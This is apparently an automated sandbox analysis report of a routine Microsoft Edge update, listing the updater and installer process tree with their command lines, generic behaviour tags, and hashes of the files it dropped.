- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MzJGNjVDQUItMTEyMi00OEVBLThFRTItRENGNjcxNTk1MUMxfSIgdXNlcmlkPSJ7N0Y4OUM1QUItMzRDMy00MUVDLTg1QjQtODE3NjhBOUJFMjE0fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MTczQzQwRkMtMEY0NC00OUU2LThCMTYtODI4QkI4Q0E4Nzg2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODMyMzYiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NDI1MTE0ODAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1NzA1NzQ0OTE2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4092
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\MicrosoftEdge_X64_133.0.3065.59.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable1⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff658e06a68,0x7ff658e06a74,0x7ff658e06a803⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1556
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DEA2C3A1-CE4D-4EDD-8583-9DD26426501C}\EDGEMITMP_C3EEF.tmp\setup.exe
Filesize6.8MB
MD51b3e9c59f9c7a134ec630ada1eb76a39
SHA1a7e831d392e99f3d37847dcc561dd2e017065439
SHA256ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae
SHA512c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e
-
Filesize
102B
MD538520d5cb207c3fa46db7472259e67c7
SHA1530314c7a67e74228e5df13841a077edd5825787
SHA25654ca9bc60aa1e7a098247ddde556b5318d47e76c581f3a0324b1c9fc5485fb28
SHA512ca94900131514cd53be3ded081370790b9514ec450ce81e88f35a2af7cc4ec4fc8056a64fbb6582dcd998300285dd34f12ba21232228488171a30d3e7afd4a96
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD54e8c04647b960577d846ed086a2de148
SHA150391eeb5b4cfad46ebf99bb8342c555d4ac4508
SHA2569b5758cbdd8dfc5c033d2666c3924118a2596d4f911eb1cb815d8b649516c502
SHA5121e4146b8f5d9f864e5e7656e18b8034b984b120f03e8a5611698a02efe6e68c00fb53c9e44d149827456ad1f40de358668c8010d59ae9860ac14d25b7b0b9d8c
-
Filesize
1KB
MD59a5f4fa7dfabce894036c25956dbbc14
SHA1f5dcbd266104d902b6beed25b689f41f18509494
SHA256426061f4b8d777ecfafa83ccbe3255144fb9e13090ad64624e08042fdb555bad
SHA512a1e48575e74e60f1c763dfbf169b3236cc017c71972cdf567042f3998c860591adc37682ed463320671030c03c7f84c81a1795a8e26c19e9f9d2288bf7584dfc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5d3830813c0b6e513182e4b5e82f558d4
SHA1b118bd01d7c47661bac8349c9cd32bdca760348c
SHA256cddbfd9e08eba0f5db55a86e534765294b4880c2bcf7cc945d90932508493999
SHA512f4b5bd75ceeb050b2b6d7f0ebfec3c37582ca1e0851c71e1e3f4e9f2ba71bc08ec8a29cedb752ea7ff56202ca15639fbefea332a53a89f76bb22912674ea1bfd
-
Filesize
4KB
MD5b128cff1b86211226528164cdc1295f3
SHA131c166d88683096510bce341ed0ebd3e73ee547f
SHA256220cce2073f07060b61e6beba9404ca6ff6639d82fdb5cd1131463d65d441253
SHA512c8533a2db66c5fa07c6a493137ef6b02e96944e69cf7808daa76e6b490a7d229df5e6192b8f87e3282be7602d8930db545dee80a78a473b2ec0b5594e5f9dfcb
-
Filesize
172KB
MD5d9be5142ce65e2bf4057ca9dfffec6fc
SHA136eec486aafc003a87d406371c7cba2b6a2d16fd
SHA256f5f632ba1b774477becf3b3e67ae633f108d41a1039606e2a92df9b66f209e66
SHA5124a82ee2b0aef43749a9d4630dd58171c6b940f66cd1d6e25dc3a1bc9f5b54333ce7ce8e1ec4577360d3cefd724569b356cade603a8c8a35a66010b11318bb495
-
Filesize
652B
MD5d59f879f8d0112fb77e6fbcda6337400
SHA15b26404fae37ac2b169b7599d2cb3429aa0f1c49
SHA2562b49490a6cd26e6289f92a87f322426d881b8d4ce717acfb943ede0a3e613750
SHA512e63897cadeaa5e49877860849f290ba396baff068360944b6781e66758eae6e6053d66554002046c2653d2b961314e7a987c59fd4fabc67c9f6038152b108fe8
-
Filesize
474B
MD525bbc5ad9a9ea6f502b2325ace0ca812
SHA1718e83ae10ddd861346d0638f35431d9316e47a8
SHA256fc0ac2df8d2cb190c37fde46a234ee9e3aa819ad3ec8ba7f3c1cff1a3f51e6ec
SHA51284dc783cf07695bea6fb3fc5d7ba08be882b3803d726d8092ff8f88ea8069469c876ecfdb130a7c569d2b48cd7999f1f07a3e75fbce2385bf8e5674702cda2c1
-
Filesize
369B
MD59ecc35d87c8ffedbcc6bfb278eba9070
SHA1d919063170385d652be4d06bbe2e924d53c2bc58
SHA25624bb0d5dab61414b74b5a3792205c60f3fa9f614dfb8056ec11078116a34d565
SHA51240995003583bdbbfdc85949fd1968046dd8c5b8475a3405a032fe2428c56444703bff1003855e5a4a42bdaec823a887a1c89dac2ed833fad1e537ec33f55278b